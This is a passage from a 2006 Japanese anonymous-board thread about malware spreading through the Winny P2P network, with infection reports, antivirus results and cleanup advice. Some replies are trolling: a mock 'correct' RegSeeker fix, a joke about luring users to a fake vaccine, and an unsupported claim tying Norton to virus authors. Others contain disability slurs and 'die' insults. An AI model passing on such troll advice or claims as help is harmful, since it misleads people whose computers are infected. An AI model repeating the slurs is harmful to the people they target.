レスアンカー : >>%d

名前欄 : %d#byoudou の意味がやっとわかった



人工無能ってこんな機能だったのか

606 :[名無し]さん(bin+cue).rar:2006/04/10(月) 10:04:45 ID:jbi4NDuT0
>>605
kwsk

607 :[名無し]さん(bin+cue).rar:2006/04/10(月) 10:32:21 ID:lA8Qmbwg0
>>606
ここを監視している警察に言いたいことを書くスレ13
http://tmp6.2ch.net/test/read.cgi/download/1139439073/431-

608 :[名無し]さん(bin+cue).rar:2006/04/11(火) 03:19:46 ID:5G5ez9Cj0
.

609 :[名無し]さん(bin+cue).rar:2006/04/11(火) 09:00:01 ID:s9908CbZ0


610 :[名無し]さん(bin+cue).rar:2006/04/11(火) 17:31:28 ID:9wFjYM9i0
ここが過疎ってるのは良いことだな

611 :[名無し]さん(bin+cue).rar:2006/04/11(火) 17:33:20 ID:uZGLd3VG0
ウイルス作者が学校始まったからだろw

612 :[名無し]さん(bin+cue).rar:2006/04/11(火) 18:00:21 ID:X/fYZ1Mz0
! あながち間違いでもないかもな・・・・w

613 :[名無し]さん(bin+cue).rar:2006/04/11(火) 18:23:47 ID:jykvpsTx0
611 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2006/04/11(火) 17:33:20 ID:uZGLd3VG0
ウイルス作者が学校始まったからだろw

612 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2006/04/11(火) 18:00:21 ID:X/fYZ1Mz0
! あながち間違いでもないかもな・・・・w


614 :[名無し]さん(bin+cue).rar:2006/04/11(火) 18:52:25 ID:X/fYZ1Mz0
自演じゃねーぞ

615 :[名無し]さん(bin+cue).rar:2006/04/11(火) 18:56:01 ID:uZGLd3VG0
というか正解と言いたいのでは…よーわからんが

616 :[名無し]さん(bin+cue).rar:2006/04/11(火) 18:56:12 ID:ond7m0/K0
>>613は作者

617 :[名無し]さん(bin+cue).rar:2006/04/11(火) 20:23:18 ID:m7wPiYEA0
>>616
警察も地味な作業で特定したみたいだしな。
朝7時に注意しろwww


618 :[名無し]さん(bin+cue).rar:2006/04/11(火) 20:55:19 ID:ciI2tzdV0
なんとかって胡散臭い会社のny監視システムみたいなもんを公的機関が作りゃ
ウィルスも著作権侵害も一網打尽かな。

619 : :2006/04/11(火) 21:21:34 ID:yv4VWRoc0
Windows XP Professionalで特定のアプリケーションの実行を禁止したいのであれば,
以下のような手順を実行すればよい。[コントロールパネル]の[管理ツール]を開
き,[ローカルセキュリティ設定]を起動する。そして[セキュリティの設定]?
[ソフトウエア制限ポリシー]のツリーを展開し,[追加の規制]を右クリックして
[新しいハッシュの規制]を選んで,実行を禁止したいアプリケーションを選択する。
これだけである。

620 :[名無し]さん(bin+cue).rar:2006/04/11(火) 21:53:21 ID:a+ReFADC0
>>618 検閲にはならない?

621 :[名無し]さん(bin+cue).rar:2006/04/11(火) 21:58:18 ID:n0HQGiyL0
[NoCD][060414]物 まだぁ〜?

622 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:21:19 ID:bSaJNfc60
nyで“NoDVD”をキーワードに0.1MB〜20MBのファイルを集めてみた。
287個のファイルが落ちてきたので、ノートンさんに見てもらった。
200個のマルウェアと1個のジョークプログラムが発見された。

うわあ! マルウェアの宝石箱やあ! じゃなくて、これじゃバカの
根絶は無理だと確信した or2

【内訳】
65個:Trojan Horse(イオナBOTなど)
52個:W32.Antinny.K
31個:W32.HLLW.Antinny
26個:W32.HLLW.Antinny.G
09個:W32.Antinny.Q
07個:Trojan.Sufiage(fusiana age)
06個:Trojan.Dropper(汎用のドロッパか)
02個:W32.Pinfi
01個:Backdoor.Nodelm(山田オルタ)
01個:Trojan.Welomoch(Sony BMGのrootkitでW32.HLLW.Antinnyを隠蔽)
01個:Joke.Hikaru(ジョークプログラム)

>>621 ちなみに、ファイル名に“060414”を含むものはなかった。

623 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:22:17 ID:+xcBk5eD0
彦麻呂w

624 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:28:51 ID:UtFYKp7W0
ウィニーでとったMP3            EXEをクリックしてからだと思うんですけど
なんかHDDからずっとアクセスしてる音がして動作が重くなりました。
なんか空き容量がいっきに全部なくなって空き容量が足りませんみたいなのが
右下のとこに出たと思ったらまた容量が500Mぐらいまでもどってまたそこから
減り続けてるみたいです。
どうすれば直りますか?助けてください!!!orz

625 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:31:43 ID:kjEJvL7I0
>>624
そんな事よりMP3の部分ダブルクリッコしてみなよ。ビームが出るよ!

626 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:34:09 ID:bSaJNfc60
>>624
シマンテック セキュリティチェック 「ウイルス検出」
http://security.symantec.com/sscv6/home.asp?langid=jp&venid=sym&plfid=23&pkj=NFSPDTKJBTVISBYWWYP
トレンドマイクロ ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
マカフィー フリースキャン
http://www.mcafee.com/japan/mcafee/home/freescan.asp

全部試して、なにか見つかったら絶望してください。


627 :[名無し]さん(bin+cue).rar :2006/04/11(火) 23:38:22 ID:4n/f5Sjx0
HDDデータ全部吹っ飛ぶウィルスもあるし対策は急務だな
つーか落としたファイルはスキャンかけるか
フォルダオプションで拡張子表示しないのチェック外せよ これ基本

628 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:42:06 ID:q4/Qb1sG0
それは、アレだな……。
前消し→上書き書込み→前消しを繰り返して、復元不可能にする奴だね。
クリック直後に、プロセスを停止させるか、再起動させるべきだった。
(´・ω・) ス

629 :628:2006/04/11(火) 23:42:46 ID:q4/Qb1sG0
×前消し
D全消し

オレ(´・ω・) ス

630 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:48:30 ID:sLy0Yksx0
>>624
マルチしやがって・・・



(´・ω・) デモカワイソス・・・

631 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:48:42 ID:VUiYx9id0
マルチポストにマジレス乙

助けてください
http://tmp6.2ch.net/test/read.cgi/download/1144765140/

632 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:52:30 ID:bSaJNfc60
外部からの指令によって2ちゃんを攻撃するイオナBOTを
ノートンさんはTrojan Horseに分類します。>>622で65個み
つかったうちのほとんどがこれだと思われます。

バスターさんはTSPY_DELF.BFWあるいはTROJ_DELF.AXE
として引っかけてくれるはずだけど、Avast!は対応待ちで、
検出できません(VPS 0615-1 4/11版でもだめ。

このほかにも、2ちゃん書き込み型マルウェアでアンチウイルス
ソフトベンダーの対応待ちのものがあります。

そんなわけで、>>626のオンラインスキャンも併用推奨なのです。


633 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:53:59 ID:nZsriccz0
すいませんみなさんありがとうございます、マルチした者です。
HDDの空き容量が40kbになったところでアクセス音が止まりました。
>>626のウイルス検出やってます

634 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:54:45 ID:q4/Qb1sG0
noDVD/CDパッチくらい小さいんだから、中身確認すればいいのにね。

635 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:56:28 ID:bSaJNfc60
>>631>>630 そんなスレあったのかーと思いきや。
立てやがったんか! バーヤバーヤ プンスカプン>624 633


636 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:57:03 ID:AbLfnv5Q0
> アクセス音が止まりました
(((( ;゜Д゜)))

637 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:59:10 ID:ZZOnnwWp0
うへw symrapidreleasedefs 4/11 5:52 を落として今見に行ったら6:42のがあったw
50分の間になにがあったんだw

638 :[名無し]さん(bin+cue).rar:2006/04/11(火) 23:59:36 ID:n0HQGiyL0
そんな状態でネットに繋いてるってのはネ申だな
きっとOS再インスコしかないだろうから諦めが肝心だよ?

639 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:00:00 ID:TszJWEb+0
そのファイルをクリックした後、異変に気づいたのですぐ削除しようと思ったんですが、
削除出来なかったので再起動したんです。そしたらHDDのカリカリ音が止まらなくなって・・・

640 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:06:39 ID:VJ05oC3o0
再起動もある意味アウトだよな。

641 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:06:46 ID:TszJWEb+0
また容量減り始めました・・・とりあえず今出来る応急処置ありませんか!?

642 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:07:25 ID:KoSnVRAh0
>>639
異変に気づいた・・・の時点で強制終了させろよ(w
セーフモードで探してみるのも手かも知れんが
638氏の言ってるようにOS再インスコしかないだろ

643 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:07:32 ID:2EVaKWjk0
>>641
大人しくクリーンインストールするが吉

644 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:10:04 ID:TszJWEb+0
セーフモードで探すっていうのは、どこにそのファイルがあるか特定できるんですか?

645 :[名無し]さん(bin+cue).rar :2006/04/12(水) 00:10:05 ID:HgarczwV0
無理と思うがシステムの復元

646 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:14:57 ID:RVCah2RR0
>>641
40KBからまだ減るのか・・・

647 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:15:51 ID:KoSnVRAh0
>>644
見るからにぁゃι気なものってのがあるだろ
既に出回ってるもんなんだから探せ!ってのも
酷か・・・(w
>>626のウイルス検出はどうなった?

648 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:19:43 ID:+S/w3sQ10
どうでもいいけど、ユーザにHDDのカリカリ音で気付かれるのは
あまりにもテスト不足じゃないですかと言いたい。

649 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:23:37 ID:TszJWEb+0
>>646
一度800Mまで増えてまた減り始めました。
まるでなにかが削除されていっているよう・・・

650 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:24:39 ID:WOIXFhH80
夜中を待って動き出すとか
夜間のみフル作動で昼は静かに動くとか
適当に間隔をあけて気づかれにくくするとか

651 :[名無し]さん(bin+cue).rar :2006/04/12(水) 00:24:45 ID:HgarczwV0
すぐに対応できないやつを見て喜ぶ香具師がいるんだろ
気付かれる気付かれないはどーでもいいだろ

652 :[名無し]さん(bin+cue).rar :2006/04/12(水) 00:25:54 ID:HgarczwV0
パーテーション切ってるドライブなら非アクティブ状態にすればいいんでねーの?

653 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:40:15 ID:HqAJsayo0
これが新型ウイルス
「いぐぅ! いぐぅ! おまんこいっちゃうのぉ! ちんこ最高! あなたの太いちんこ最高〜!」
の誕生の瞬間だった。

言えるものなら言ってみろ>テレビ局
別に「びっこかたわきちがいめくらつんぼ白痴ウイルス」でもいいけど。

654 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:45:39 ID:/XWgrNMI0
>>653
アンチウイスルベンダ発案の名称で統一されるのが落ち

655 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:51:59 ID:zDY/hlRw0
>>637
で、7:55のが来てるわけですが

656 :[名無し]さん(bin+cue).rar:2006/04/12(水) 00:53:34 ID:gr459IBI0
略ウィルス

657 :びっこかたわきちがいめくらつんぼ白痴ウイルス:2006/04/12(水) 00:58:31 ID:5LgXxg5C0
 

658 :[名無し]さん(bin+cue).rar:2006/04/12(水) 01:07:17 ID:5hTMV+AE0
>>649
タスクマネージャー見てみたら?

659 :[名無し]さん(bin+cue).rar:2006/04/12(水) 01:19:02 ID:zDY/hlRw0
>>649
どうしようもなくなったらここ見てすっきりするといいよ
http://ex14.2ch.net/test/read.cgi/news4vip/1144765820/

660 :[名無し]さん(bin+cue).rar:2006/04/12(水) 01:51:53 ID:FGGOTPoW0
お前らウィルスの方はアップさせたんだろうな?

661 :[名無し]さん(bin+cue).rar:2006/04/12(水) 03:35:43 ID:Ht8Tvu2P0
キンタマだってAntinyで統一
そんなもんよ

662 :[名無し]さん(bin+cue).rar:2006/04/12(水) 13:57:05 ID:aA5bBrE70
>>661
nが一個足らん。

663 :[名無し]さん(bin+cue).rar:2006/04/12(水) 14:46:26 ID:Ij37XAHc0
http://headlines.yahoo.co.jp/hl?a=20060411-00000044-zdn_ep-sci

664 :[名無し]さん(bin+cue).rar:2006/04/12(水) 19:20:48 ID:epZSR44h0
>>661
そもそも類似点があれば同一種として分類するのが一般的だからね。
この辺のやつはnyで暴露とか2chへの爆撃とかで括って扱ってるね。

665 :p4077-adsao12honb5-acca.tokyo.ocn.ne.jp:2006/04/13(木) 00:08:40 ID:qu40Rbiw0
ゴジラ対若大将

666 :[名無し]さん(bin+cue).rar:2006/04/13(木) 02:29:17 ID:fm8BWs3M0
060414まだこないなあ
作者飽きたんか

667 :[名無し]さん(bin+cue).rar:2006/04/13(木) 18:07:54 ID:11Uh08X60
keygenとかパッチって.exeなのが不審じゃないところも普及に貢献してるのかな?
こういうのは昔から色々仕込まれてて扱いに注意しなければいけないタイプのファイルだったのだが。

668 :[名無し]さん(bin+cue).rar:2006/04/13(木) 19:17:49 ID:DnjcNYMp0
最近はよほど出所不明でもない限りはKeygenの類でも一応安全なんでは

669 :[名無し]さん(bin+cue).rar:2006/04/13(木) 19:48:46 ID:e9GJtEJt0
nyのは全部出所不明なわけだが

670 :[名無し]さん(bin+cue).rar:2006/04/13(木) 20:03:14 ID:Iq8dzIB60
nyでKeygen拾ってくるのはバカのすること

671 :[名無し]さん(bin+cue).rar:2006/04/13(木) 20:14:30 ID:nqyANC+70
むしろNoDVD patchとかkeygen類のものがウイルスの宝庫なんだがw

672 :[名無し]さん(bin+cue).rar:2006/04/14(金) 00:25:20 ID:eHmukt200
新種のイオナズンが確認された

http://live22x.2ch.net/test/read.cgi/news/1144896909/940-

673 :[名無し]さん(bin+cue).rar:2006/04/14(金) 00:37:28 ID:/VFpYd790
>>672
すごいな

674 :[名無し]さん(bin+cue).rar:2006/04/14(金) 00:38:25 ID:Nx6FXTsU0
Bitdefender8はまだイオナズン対応なしだな

675 :[名無し]さん(bin+cue).rar:2006/04/14(金) 14:36:40 ID:MlR7JVyl0
botに感染してても気がつかないようなやつは、ワクチンなんて見た
こともないんだろうな。もしくは期限切れてても平気なやつとか。

676 :[名無し]さん(bin+cue).rar:2006/04/14(金) 17:27:15 ID:H8ZiqLvt0
ttp://headlines.yahoo.co.jp/hl?a=20060414-00000018-inet-sci
デルは2006年4月13日、防衛庁から5万6,000台以上の
クライアントPC案件を受注した、と発表した。


ny特需だねw

677 :[名無し]さん(bin+cue).rar:2006/04/14(金) 17:59:15 ID:+h7KzSiE0
>>675
nyで落としたノートンを使うために怪しいkeygenを使って感染…
と言うやつなら見たことがあるよ。


678 :[名無し]さん(bin+cue).rar:2006/04/14(金) 19:26:37 ID:scCNsTZe0
antyny.Aって解凍しただけじゃ感染しないよね?
zip解凍後、フォルダ開いたら見つかったんだけど


679 :[名無し]さん(bin+cue).rar:2006/04/14(金) 19:33:52 ID:xa0zR+eZ0
そんな質問する時点でもっとヤバいウイルスに感染してる可能性大。

680 :[名無し]さん(bin+cue).rar:2006/04/14(金) 19:34:40 ID:ja4xiYp50
>>678
そんな調子じゃ既にいっぱい感染してそうだから、リカバリしたほう
がいいと思うのは俺だけ?

681 :[名無し]さん(bin+cue).rar:2006/04/14(金) 19:35:14 ID:wElo8qO40
あーあ

682 :[名無し]さん(bin+cue).rar:2006/04/14(金) 19:43:27 ID:scCNsTZe0
>>679
いや普段は基本的にキャプ動画だけなので


>>680
今回についてはとりあえず安心ってこと?

683 :[名無し]さん(bin+cue).rar:2006/04/14(金) 19:45:52 ID:jzBlqCZk0
>>682
  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/

684 :[名無し]さん(bin+cue).rar:2006/04/14(金) 20:59:39 ID:B3VeW0jK0
>>682
ウイルスでばっちぃのは女の子に嫌われるぞ

685 :[名無し]さん(bin+cue).rar:2006/04/14(金) 21:18:05 ID:NU7w0awn0
なら問題ないな

686 :77.236.150.220.ap.seikyou.ne.jp:2006/04/14(金) 22:43:29 ID:kxKMvLVM0
カッパってほんとにいるのかな?

687 :[名無し]さん(bin+cue).rar:2006/04/15(土) 01:08:42 ID:KPJ+fGGr0
      ▅▓▓▅▂▅▓▓▅
    ◢█▓ ▓██▓  ▓▓▋     ◢◣▂
  ▃▅█▓▓▓██▓▓▓▆█■     ▍ ◥◣
 █▓ ▓█■▀▀▀■█▓▓▓▓▅   ▐◣▂▍
  █▓▅▊▅     ▀█▓  ▓█     ▍
 █▇▓▊ ▅   ■  █▓▓▓█▀   ◢▍
▐▓ ▓█◣◢◣▂◢    ██▇▆■▅▃▂◢◤
█▓▓▆█▅     ▅█▓▓▓▓▉  ▼
▀█▇█▓▓▇▅▃▅▓▓█▓   ▓█   ▍
   █▓ ▓▓█▓  ▓▓█▓▓■▀ ▂◢▌
   ▀▓▓▓██▓▓▓▓■▀▃◢◤▼ ▐
     ▀▀  ▀█▇■▀▍  ▍   ▍  ▍
         ▐▃◢▍  ▍  ▍  ▐▃◢▍
                ▐▂▃▍


688 :[名無し]さん(bin+cue).rar:2006/04/15(土) 01:51:56 ID:iOO8iQ1a0
読めねー。

689 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:19:12 ID:6o7SduHr0
【動画】 無修正 えっこんなに綺麗な女性が・・・やらしすぎる三宮里緒.avi

再生したら変な映像が一瞬再生されて終了。まさかこれウィルスですか?
.aviで再生したら感染ってあるんですか?

690 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:22:40 ID:Y/th1di50
(´・ω・`)知らんがな

691 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:26:15 ID:+3pvF0kS0
>>689
(´・ω・) カワイソス

692 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:29:08 ID:gLJHc5it0
>>689
MMname2で分析してみろ

693 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:36:29 ID:6o7SduHr0
>>692
「オーバーフローしました」ってエラーが出てmmname2強制終了した

694 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:37:30 ID:gLJHc5it0
>>693
wwwwww

695 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:37:58 ID:uQMzVQG+0
aviならいいよ。
感染ないよ。

696 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:39:02 ID:6o7SduHr0
じゃあ単なる捏造ですか?

697 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:43:38 ID:nkJmZood0
aviで感染なんていくらでもあるよ。。(-_-;


698 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:51:20 ID:Y/th1di50
それは、バッファーオーバーランを利用したニュイルスだな

699 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:54:53 ID:6o7SduHr0
ウィルスなんですか?
どうすればいい?
どこに感染したファイルある?

700 :[名無し]さん(bin+cue).rar:2006/04/15(土) 02:56:47 ID:+3pvF0kS0
>>699
(´・ω・) ・・・カワイソス

701 :[名無し]さん(bin+cue).rar:2006/04/15(土) 03:06:37 ID:cUivaWLA0
>>683

702 :[名無し]さん(bin+cue).rar:2006/04/15(土) 03:16:12 ID:on79lFhG0
>>699
avi形式のウイルスに感染した!

├ 1.PCを買い換える or OSを再インスコする
│                              
│    [まちがい]                         
│      確実な方法ではありますが、お金がかかるのが難点です。
│      それよりも別の手段を探してみませんか?
│      ちょっとしたフリーウェアでなんとかなるかも?
│              ↑
│          ココがポイント!

└ 2.RegSeekerを使う

      [せいかい]

Regseeker
ttp://www.hoverdesk.net/freeware.htm
Regseeker 1.45 文字化け回避パッチ
ttp://www2.pf-x.net/~lazydog/zakki/regseeker_patch.htm


703 :[名無し]さん(bin+cue).rar:2006/04/15(土) 03:19:15 ID:gLJHc5it0
RegSeekerでOSをダメにするやつってどんだけスキルが低いんだろうなww
まあ、自分がひどい目に遭ったから、他人も道連れにしたいという気分は分からないでもないけどねww

704 :[名無し]さん(bin+cue).rar:2006/04/15(土) 03:25:19 ID:wz1W8kk80
nyにnoDVDパッチってワクチンがあるから使え





とか書いたら特攻するんだろうか・・・

705 :[名無し]さん(bin+cue).rar:2006/04/15(土) 03:28:53 ID:yp2vXKyy0
>>702
ktkr

706 :[名無し]さん(bin+cue).rar:2006/04/15(土) 04:21:04 ID:fW3v3vwQ0
>>705
死ねよ糞VIPPER

707 :[名無し]さん(bin+cue).rar:2006/04/15(土) 04:48:15 ID:MTHnnFp20
>>699
死ね

708 :[名無し]さん(bin+cue).rar:2006/04/15(土) 11:01:17 ID:Jdw5x9xz0
>>676
【Winny】"捜査資料の流出で" 国費で全国の警察官にPC配備…国家公安委員長が検討
http://news19.2ch.net/test/read.cgi/newsplus/1145016031/

709 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:01:34 ID:KPJ+fGGr0
>>708
そのPCを持ち帰れるならばそれでnyするようになるし
持ち帰れないならやっぱり自分用のPCで仕事するのではないかな?

710 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:03:29 ID:vsLX595k0
>>709
そのPCにはny入らない仕様です
データもHDD上に残せない仕様

711 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:03:48 ID:jvRJ8jGA0
解析班のみなさん殺人 写真集の解析はまだですか?
感染してしまって解決法がわからず怯える毎日です。
私を助けてください><

712 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:10:13 ID:yLM/NrMh0
>>711
くりーんいんすとーる

713 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:14:16 ID:3X98d5lg0
洒落はnyみたいに長持ちしないから流出しても少しマシ

714 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:17:08 ID:jvRJ8jGA0
>>712
>>713
対処法をおねがいします><
うpフォルダは削除しました

715 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:20:32 ID:pHLIho4/0
>>714
>>6

716 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:20:57 ID:jvRJ8jGA0
専用スレがあるみたいなのでそちらで聞きます
ありがとうございやした。

717 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:21:02 ID:mGIrcAT30
>>714
それが人に聞く態度か

718 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:33:11 ID:KPJ+fGGr0
>>710
なるほど。
でも、不便だったら自分のPCでデータも作っちゃうから
HDDに残せない仕様とやらは効果がないのでは?

719 :[名無し]さん(bin+cue).rar:2006/04/15(土) 13:59:23 ID:vsLX595k0
>>718
中央サーバ管理でデータを保存 データ自体は持ち出せないように勝手にロックされるはず
まあ1から自分のpcにデータも作っちゃったら意味無いが膨大なデータ一々作り直すかな?

720 : :2006/04/15(土) 16:39:23 ID:mbvEH1tZ0
ウイルスを最初に公開してる奴のIPはフィリピンからのものが多い。

ノートンは、その研究・開発の拠点を、
人件費・英語が出来るということから、フィリピンに置いている。

721 :[名無し]さん(bin+cue).rar:2006/04/15(土) 17:08:45 ID:Y/th1di50
             ,.,.,.,.,.,.,.,.,__
           ,,;f::::::::::::::::::::::ヽ
           i::::::::/'" ̄ ̄ヾi
           |:::::::| ,,,,,_  ,,,,,,|
           |r-==( 。);( 。)
           ( ヽ  :::__)..:: }
        ,____/ヽ  ー== ;    ほほう それでそれで?
     r'"ヽ   t、   \___ !
    / 、、i    ヽ__,,/
    / ヽノ  j ,   j |ヽ
    |⌒`'、__ / /   /r  |
    {     ̄''ー-、,,_,ヘ^ |
    ゝ-,,,_____)--、j
    /  \__       /
    |      "'ー‐‐---''

722 :[名無し]さん(bin+cue).rar:2006/04/15(土) 19:13:20 ID:DsulPArq0
>>721
つまり研究拠点をフィリピンに置いたのは
実に冴えた判断だったってことだろ。

723 :[名無し]さん(bin+cue).rar:2006/04/15(土) 19:16:03 ID:l8KViUAV0
>>721
つまり研究拠点がフィリピンにあることで
メーカー自作自演確定ってことだろ。

724 :[名無し]さん(bin+cue).rar:2006/04/15(土) 19:21:00 ID:PRkT9DH10
>>721
つまりノートンの製品を買っておけば
安心ってことだろ。

725 :[名無し]さん(bin+cue).rar:2006/04/15(土) 19:28:04 ID:f6UsuDX70
>>720
マジで?

726 : :2006/04/15(土) 20:09:43 ID:mbvEH1tZ0
とりあえず、明確にソースが出せるので、
有名なのは、昔世間を騒がせたI LOVE YOUメールのあれですな。

LOVEウイルスの容疑者、不起訴(フィリピン法務省)(2000.8.31)
http://old.netsecurity.ne.jp/article/2/903.html

727 :[名無し]さん(bin+cue).rar:2006/04/15(土) 20:43:41 ID:YiBaAa3s0
>>726
それ以外にあるの?
つか、それただのガキじゃなかったか?
ノートンと結びつけるソースくれ。

728 :[名無し]さん(bin+cue).rar:2006/04/15(土) 21:01:29 ID:HgCkiXly0



729 :[名無し]さん(bin+cue).rar:2006/04/15(土) 21:14:36 ID:kF2dTjCh0
ウイルス流す香具師が串さえ使わないのは考えにくいな。
つまりウイルス作者はノートンがマッチポンプでやってると思わせてる

に100ペソ

730 :[名無し]さん(bin+cue).rar:2006/04/15(土) 22:53:57 ID:3KY2dnkY0
どーせアメリカの暇人だろうに

731 :[名無し]さん(bin+cue).rar:2006/04/16(日) 01:25:23 ID:mkc0c+s30
すまん。真剣に教えてくれ。
スクショ撮って、それを外部から閲覧するウィルス系って、
スクショは何秒おきくらいに撮ってるんだろうか?
オンラインバンクのログインの最中を撮られてたらエラいことだよな?
キーロガー対策でセキュリティボード使ってるんだが、イマイチ不安だ。

732 :[名無し]さん(bin+cue).rar:2006/04/16(日) 01:27:35 ID:SxI4td1A0
>>731
そんなん、山田ならなんぼでもあったよ
あれは任意のタイミングで撮れるから。

733 :[名無し]さん(bin+cue).rar:2006/04/16(日) 01:28:15 ID:YQF1Y+C+0
キンタマ系は知らんけど山田はリアルタイム。
アクセスがあった瞬間にキャプチャしてる。

734 :[名無し]さん(bin+cue).rar:2006/04/16(日) 01:39:12 ID:9lGaWscR0
実際ログインの瞬間を撮られている画像あるし…
怖いなら近づかないことね

735 :[名無し]さん(bin+cue).rar:2006/04/16(日) 02:56:13 ID:a6qZdfxg0
山田だけじゃない。
気付きにくいドクロはもっと深刻だ。
あれでもヤフオクの取引きでハンドル名、実名、口座番号、メール相手の名と内容、メッセ等々、ヲチされている。
山田の場合は、メール履歴やアドレス帳も取られるから、被害は未曾有だけどね。

736 :[名無し]さん(bin+cue).rar:2006/04/16(日) 03:20:58 ID:IiMZp9NL0
マンガミーヤで解凍せず、展開しただけで感染することってありますか?
中身はAntinny.Jっぽいのですが

737 :[名無し]さん(bin+cue).rar:2006/04/16(日) 03:21:51 ID:pJ31XNbx0
>>736
バージョン次第だが、ある

738 :[名無し]さん(bin+cue).rar:2006/04/16(日) 04:06:30 ID:NnOqF/5w0
あるのか!!


739 :[名無し]さん(bin+cue).rar:2006/04/16(日) 04:10:26 ID:X3tfPL+s0
解凍してもプログラムとして実行しないから
ウイルスは喰らわないのでは?

740 :731:2006/04/16(日) 04:24:56 ID:mkc0c+s30
レスくれたみんなサンクス。
思い当たるところがあるワケじゃないが、
怖いから早々にもクリーンインスコするよ。
何かあってからじゃシャレにならんしね。

741 :[名無し]さん(bin+cue).rar:2006/04/16(日) 05:04:30 ID:aJzJ0w5L0
オンラインバンキングを利用しているなら、まずイーサの線を抜いて
銀行に連絡&パスワード等の変更だよ。クリーンインスコするのは
そのあと。

クリーンインスコしちゃうとウイルスに感染しているかどうかを確かめ
る術を失うけど、オンラインバンキングサービスのパスを抜かれて
いる可能性があるなら、念には念をいれないといかんから銀行への
連絡と手続きが最優先だとおもー。

742 :[名無し]さん(bin+cue).rar:2006/04/16(日) 05:14:40 ID:6HVx5zlz0
オンラインバンキングだけじゃなく
クレカを使ってるならそれも
楽天、Yahoo、ISP等、ショッピングや会員、Webメール
それらのID、パスも変更届けだしてから即再インスコ
インスコ後、更にIDやパスは変更する

743 :[名無し]さん(bin+cue).rar:2006/04/16(日) 06:51:24 ID:nvC7fmBx0
        _,,:-ー''" ̄ ̄ ̄ `ヽ、
     ,r'"           `ヽ.
 __,,::r'7" ::.              ヽ_
 ゙l  |  ::              ゙) 7
  | ヽ`l ::              /ノ )
 .| ヾミ,l _;;-==ェ;、   ,,,,,,,,,,,,,,,_ ヒ-彡|
  〉"l,_l "-ー:ェェヮ;::)  f';;_-ェェ-ニ ゙レr-{   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  | ヽ"::::''   ̄´.::;i,  i `'' ̄    r';' }   | 久々にニュイルス
 . ゙N l ::.  ....:;イ;:'  l 、     ,l,フ ノ   | ウィルススキャンもせず、中身確認もしないで解凍していた
 . |_i"ヽ;:...:::/ ゙'''=-='''´`ヽ.  /i l"  < のが昔の俺なんだよな今の俺は一応ウィルススキャンして、WinRARで中身を
   .| ::゙l  ::´~===' '===''` ,il" .|'".    | 確認して怪しいやつは解凍せずに捨てるから困らない
    .{  ::| 、 :: `::=====::" , il   |     \________
   /ト、 :|. ゙l;:        ,i' ,l' ノト、
 / .| \ゝ、゙l;:      ,,/;;,ノ;r'" :| \
'"   |   `''-、`'ー--─'";;-'''"   ,|   \_

744 :[名無し]さん(bin+cue).rar:2006/04/16(日) 07:10:56 ID:KbBuKH060
WinRARつかわなくても右クリ→エクスプローラーで中身わかるんじゃね

745 :[名無し]さん(bin+cue).rar:2006/04/16(日) 09:29:32 ID:dN1HrVbc0
>>739
実行しなくてもウイルスに感染する事はあるぞ

746 :[名無し]さん(bin+cue).rar:2006/04/16(日) 10:15:11 ID:YQF1Y+C+0
>>745
どういう例よそれ

